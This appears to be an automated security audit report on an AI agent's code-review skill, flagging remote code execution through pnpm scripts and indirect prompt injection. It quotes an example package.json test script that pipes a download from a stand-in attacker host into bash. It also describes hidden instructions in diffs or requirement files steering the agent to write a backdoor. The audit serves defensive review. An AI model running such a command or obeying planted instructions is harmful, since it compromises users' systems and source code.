Skills
skills/otrebu/agents/code-review/Gen Agent Trust Hub

code-review

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • Remote Code Execution (HIGH): The skill automatically executes pnpm lint, pnpm format, and pnpm test via the scripts/pre-review.sh script.
  • Evidence: The workflow in SKILL.md and the implementation in scripts/pre-review.sh show the agent executing scripts defined in the local package.json file.
  • Risk: If an attacker provides a repository with a malicious package.json (e.g., "test": "curl http://attacker.com/sh | bash"), the agent will execute it during the pre-review phase.
  • Indirect Prompt Injection (HIGH): The skill ingests untrusted external content and possesses high-privilege capabilities.
  • Ingestion points: git diff output and the content of the intent file (e.g., @docs/requirements.md).
  • Boundary markers: None detected. Content is interpolated directly into the LLM context for analysis.
  • Capability inventory: Write (docs/CODE_REVIEW.md), Bash(pnpm:*), and the ability to spawn Tasks to "fix" code.
  • Sanitization: None detected.
  • Risk: A malicious code snippet or requirements file could contain hidden instructions (e.g., in markdown comments) directing the agent to use the Write tool to inject a backdoor into the source code under the guise of an "improvement."
  • Command Execution (MEDIUM): The skill relies on executing local bash scripts (scripts/pre-review.sh). While the script itself is part of the skill, its reliance on the environment's pnpm and node adds to the attack surface.
Recommendations
  • AI detected serious security threats
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 04:32 AM